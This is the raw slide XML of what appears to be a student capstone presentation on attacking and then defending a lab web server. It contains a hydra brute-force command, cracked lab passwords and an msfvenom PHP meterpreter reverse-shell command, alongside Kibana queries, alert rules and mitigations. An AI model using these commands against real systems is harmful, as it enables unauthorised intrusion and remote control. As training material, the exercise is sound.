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201192-3C36-4D02-B7DA-2CFD89860A35}">
  <a:tblStyle styleId="{48201192-3C36-4D02-B7DA-2CFD89860A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4d6f703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e4d6f703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4b24e1895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4b24e1895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 00:32 UTC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 192.168.1.90 : the attacker VM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What indicates that this was a port scan? Multiple packets sent from the same source IP to the same destination IP, but with several different  destination ports. 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860,905 packets were generated by the Kali machine. THAT’S INSANE. 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HTTP response status code: 401 indicates attempted and failed log in attempts--indicating a brute force attack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HTTP response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>status code: 301 indicates successful log in--indicating that the attacker succeeded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Indicators of this attack: a large number of failed log in attempts all made by the user agent Hydra, a well known password cracking tool.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3096aed0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3096aed0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b24e1895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4b24e1895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HACK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would be difficult to block a port scan, but we can limit the response that the machine returns back. Block ping requests that indicate if the host is up &amp;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3096aed0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3096aed0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4b24e1895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4b24e1895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4b24e1895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4b24e1895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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="58" name="Google Shape;58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" name="Google Shape;76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" name="Google Shape;82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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p17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7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0" name="Google Shape;90;p17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95" name="Google Shape;95;p1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828450" y="3543300"/>
            <a:ext cx="148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Murphy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July 19,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Connecting to WebDAV server </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190875" y="3312550"/>
            <a:ext cx="21393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190875" y="740425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13" name="Google Shape;213;p28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3145656" y="788840"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="214" name="Google Shape;214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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="1274100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Followed Ashton’s notes in the secret folder and used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CrackStation to crack Ryan’s password and connect to the webdav server using his elevated credentials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D9E8"/>
              </a:solidFill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2404875" y="740413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2330175" y="1274088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cracked Ryan’s password: linux4u and connected to the webdav server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902" y="64850"/>
            <a:ext cx="670073" cy="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75" y="3581775"/>
            <a:ext cx="6408975" cy="119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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="9130" r="4973" t="77818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4369875" y="898488"/>
            <a:ext cx="4689550" cy="53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28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39154" l="27489" r="3734" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394715" y="1466800"/>
            <a:ext cx="3261761" cy="220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Local File Inclusion (LFI) Vulnerability </a:t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190875" y="740425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29" name="Google Shape;229;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3283406" y="788853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Google Shape;230;p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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="1274100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 reverse shell payload using msfvenom against the webdav.dav server.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D9E8"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2542625" y="740425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2467925" y="1274100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uploaded the shell.php exploit and gained a meterpreter reverse php shell against the victim server.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Msfvenom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114925" y="4547675"/>
            <a:ext cx="6870300" cy="35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</a:rPr>
              <a:t>msfvenomsfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=1996 -f raw -o shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="11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625" y="694788"/>
            <a:ext cx="4361475" cy="22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177" y="3075477"/>
            <a:ext cx="2507175" cy="7698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902" y="64850"/>
            <a:ext cx="670073" cy="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6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="41534"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4753225" y="3010849"/>
            <a:ext cx="4199751" cy="129021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Kibana Query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53600" y="4550700"/>
            <a:ext cx="5429400" cy="35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source.ip : 192.168.1.90 AND destination.ip : 192.168.1.105 AND destination.port: *</a:t>
            </a:r>
            <a:endParaRPr sz="11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4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="17695" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="794026"/>
            <a:ext cx="8861450" cy="2657100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="thinThick" w="38100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5899125" y="3451125"/>
            <a:ext cx="3078600" cy="2078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860,905</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requests occurred July 8, 2021 at 00:32 UTC.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number of packets generated is indicative of a port scan.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8" name="Google Shape;258;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325575" y="3485500"/>
            <a:ext cx="2322300" cy="13695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850" y="3543303"/>
            <a:ext cx="281723" cy="217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850" y="4156815"/>
            <a:ext cx="281723" cy="217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5960175" y="2267550"/>
            <a:ext cx="2484000" cy="2137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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5606025" y="2223900"/>
            <a:ext cx="3277500" cy="2638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15,781 requests occurred July 8, 2021 at 1:49 UTC.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The company’s secret folder contained detailed notes for connecting to the WebDav server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7" name="Google Shape;26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Kibana Query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25" y="741300"/>
            <a:ext cx="5340920" cy="2997712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="thickThin" w="38100">
            <a:solidFill>
              <a:srgbClr val="1D8BE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32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="160725" y="4522000"/>
            <a:ext cx="87228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source.ip : 192.168.1.90 AND destination.ip : 192.168.1.105 AND url.full: "http://192.168.1.105/company_folders/secret_folder"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6249" y="1277850"/>
            <a:ext cx="4627375" cy="781750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21" y="2267554"/>
            <a:ext cx="354146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021" y="3319629"/>
            <a:ext cx="354146" cy="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69" y="721525"/>
            <a:ext cx="5984856" cy="2121950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0" name="Google Shape;280;p33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6274024" y="2865875"/>
            <a:ext cx="2614800" cy="1808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Kibana Query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23931" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="2944876"/>
            <a:ext cx="3000000" cy="855075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" name="Google Shape;284;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="4468150"/>
            <a:ext cx="2473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http.response.status_code : 401</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="285" name="Google Shape;285;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589375" y="4468150"/>
            <a:ext cx="2473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http.response.status_code : 301</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp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800" y="795599"/>
            <a:ext cx="2614800" cy="423007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7" name="Google Shape;287;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5896350" y="2865875"/>
            <a:ext cx="3495300" cy="1494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15,768 failed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attempts during the brute force attack on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July 8, 2021 at 1:49 UTC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2 login attempts were successful, indicating the attacker discovered a password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6350" y="3899709"/>
            <a:ext cx="377667" cy="322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6350" y="2923847"/>
            <a:ext cx="377667" cy="32258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6144000" y="48755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7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="52521" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="116184" y="959126"/>
            <a:ext cx="4470093" cy="5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idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338125" y="1313850"/>
            <a:ext cx="3277500" cy="1548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122 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>packets sent over port 80 to the webdav server on July 8th at 3:06 UTC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7" name="Google Shape;297;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692275" y="1313850"/>
            <a:ext cx="2451900" cy="830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Kibana Query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116175" y="4468150"/>
            <a:ext cx="72414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source.ip : 192.168.1.90 AND destination.ip : 192.168.1.105 AND url.full: "http://192.168.1.105/webdav"</a:t>
            </a:r>
            <a:endParaRPr sz="11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49" y="922513"/>
            <a:ext cx="4376524" cy="2929375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121" y="1362079"/>
            <a:ext cx="354146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988" y="3790638"/>
            <a:ext cx="6867525" cy="676275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idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5338125" y="1313850"/>
            <a:ext cx="3277500" cy="1548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112 packets sent over port 80 to the webdav server on July 8th at 3:06 UTC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9" name="Google Shape;309;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692275" y="1313850"/>
            <a:ext cx="2451900" cy="8622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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reverse shell script on the WebDav Server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Kibana Query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116175" y="4468150"/>
            <a:ext cx="7942200" cy="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source.ip : 192.168.1.90 AND destination.ip : 192.168.1.105 AND url.full: "http://192.168.1.105/webdav/shell.php"</a:t>
            </a:r>
            <a:endParaRPr sz="11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121" y="1362079"/>
            <a:ext cx="354146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700" y="3333250"/>
            <a:ext cx="6213200" cy="959850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825" y="799175"/>
            <a:ext cx="4914958" cy="2009100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="AFC0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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142350" y="1333450"/>
            <a:ext cx="2451900" cy="15480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Secure Shell (SSH)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116175" y="393443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Kibana Query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50" y="964450"/>
            <a:ext cx="5038725" cy="2286000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36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="4512100"/>
            <a:ext cx="5605500" cy="35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365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source.ip : 192.168.1.90 AND destination.ip : 192.168.1.105 AND destination.port: 22</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Google Shape;325;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788200" y="1333450"/>
            <a:ext cx="3277500" cy="637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172 packets on port 22 on July 8th at 2:16 UTC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Connection was made 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from the attacker’s machine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to the victim’s machine using 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Ryan’s SSH login credentials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196" y="1424529"/>
            <a:ext cx="354146" cy="2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196" y="2043691"/>
            <a:ext cx="354146" cy="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10" name="Google Shape;110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3" name="Google Shape;11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6" name="Google Shape;11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" name="Google Shape;11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2" name="Google Shape;122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" name="Google Shape;123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340" name="Google Shape;340;p38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an alert if several packets are sent from the same source IP to several different ports.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Port scans are not inherently a threat, therefore; it is important to apply alternate countermeasures.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1" name="Google Shape;341;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456325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Close all open ports that are not needed for standard access, such as port 22.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Block ICMP echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requests.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Filter open ports with firewall rules.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2" name="Google Shape;342;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228850" y="3712750"/>
            <a:ext cx="45633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alert tcp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any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any -&gt; 192.168.1.105 any (msg:"NMAP TCP Scan”;)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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4792150" y="3810100"/>
            <a:ext cx="4563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Firewall-cmd --zone=public --add-icmp-block=echo-reply --add-icmp-block=echo-request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349" name="Google Shape;349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an alert for any machines that attempt to access the hidden directory.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1" name="Google Shape;351;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4493325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Removing this file from the server would be the best mitigation for this attack.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357" name="Google Shape;357;p4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Alert for brute forcing attacks if the user_agent.original value includes the names Hydra, John, or Hashcat.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Set an alert if over 10+ failed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attempts are made within 1 hour.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8" name="Google Shape;358;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="16047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Lock out 10 failed login attempts from the same IP address.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Use a CAPTCHA to prevent automated login attempts.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Enable two factor authentication to not cause a DoS. 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364" name="Google Shape;364;p4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an alert if an unknown machine is attempting to access the webdav directory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Set an alert if an unknown IP address is accessing the WebDav directory.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5" name="Google Shape;365;p4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Create a firewall rule to only allow connections to this directory from certain machines.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Remove the ability to traverse directories on the URL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371" name="Google Shape;371;p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an alert for any .php files that are uploaded to the server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Maintain a white list of files that may be included by the page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3" name="Google Shape;373;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506575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Remove the ability to remotely upload files to the server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Maintain a white list of acceptable file names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Key-Based authentication instead of password-based authentication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6847500" y="388675"/>
            <a:ext cx="2143200" cy="45270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00" y="659100"/>
            <a:ext cx="5090051" cy="44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7083300" y="388675"/>
            <a:ext cx="1671600" cy="1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Address Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 192.168.1.1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933300" y="1554475"/>
            <a:ext cx="1971600" cy="3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="9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achines</a:t>
            </a:r>
            <a:endParaRPr sz="9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IPv4: 192.168.1.1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Windows 10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ML-RefVm-684427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IPv4: 192.168.1.105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Ubuntu Linux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Capstone/ Victim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IPv4: 192.168.1.90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Kali Linux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Attacker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IPv4: 192.168.1.100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OS: Linux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Hostname: ELK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52" name="Google Shape;152;p23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" name="Google Shape;153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60" name="Google Shape;160;p24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{48201192-3C36-4D02-B7DA-2CFD89860A35}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10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Hyper-V hosts the ELK, Capstone, and Kali VMs.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Collects network logs between attacker machine and victim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VM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902" y="64850"/>
            <a:ext cx="670073" cy="5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68" name="Google Shape;168;p25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{48201192-3C36-4D02-B7DA-2CFD89860A35}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ability to guess passwords against users.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elevate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gain access to sensitive data on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shell/ remote command execution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capability allows the attacker to establish a remote connection with the vulnerable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Remotely execute commands on the victim machine.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902" y="64850"/>
            <a:ext cx="670073" cy="5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Port Enumeration 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190875" y="3312550"/>
            <a:ext cx="21393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875" y="740425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77" name="Google Shape;177;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3145656" y="788853"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="178" name="Google Shape;178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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="1274100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port enumeration using nmap to discover the victim machine.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Nmap 192.168.1.0/24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D9E8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2404875" y="740425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2330175" y="1274100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Found the victim machine within the network.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web server protocol HTTP port 80 and the secure shell protocol port 22 open. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="DBD9E8"/>
              </a:solidFill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116175" y="375388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Nmap </a:t>
            </a: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116175" y="4367325"/>
            <a:ext cx="1890300" cy="35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nmap</a:t>
            </a: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 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr sz="11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902" y="64850"/>
            <a:ext cx="670073" cy="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79274" l="0" r="53980" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4618875" y="788850"/>
            <a:ext cx="3107001" cy="1076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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10857" l="0" r="19465" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4618875" y="1985650"/>
            <a:ext cx="3542500" cy="25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Forcing Password &amp; Gaining Access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190875" y="3312550"/>
            <a:ext cx="21393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190875" y="740425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3145656" y="788840"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="196" name="Google Shape;196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27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="1274100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Hydra within the Kali Linux Attacker machine in order to crack the user Ashton’s password.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BD9E8"/>
              </a:solidFill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2404875" y="740413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3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="32556" l="1196" r="20599" t="43057"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2330175" y="3120650"/>
            <a:ext cx="5505520" cy="72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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="116175" y="4354075"/>
            <a:ext cx="8686500" cy="35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highlight>
                  <a:schemeClr val="dk1"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>hydra -l ashton -P /usr/share/wordlists/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F8F8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2330175" y="1274088"/>
            <a:ext cx="2039700" cy="17394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logged in as user Ashton via bruteforce.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Username: ashton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Password: leopoldo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116175" y="3753888"/>
            <a:ext cx="1890300" cy="5337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Hydra Command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902" y="64850"/>
            <a:ext cx="670073" cy="5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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="389" r="9014" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4544175" y="1114150"/>
            <a:ext cx="4408800" cy="173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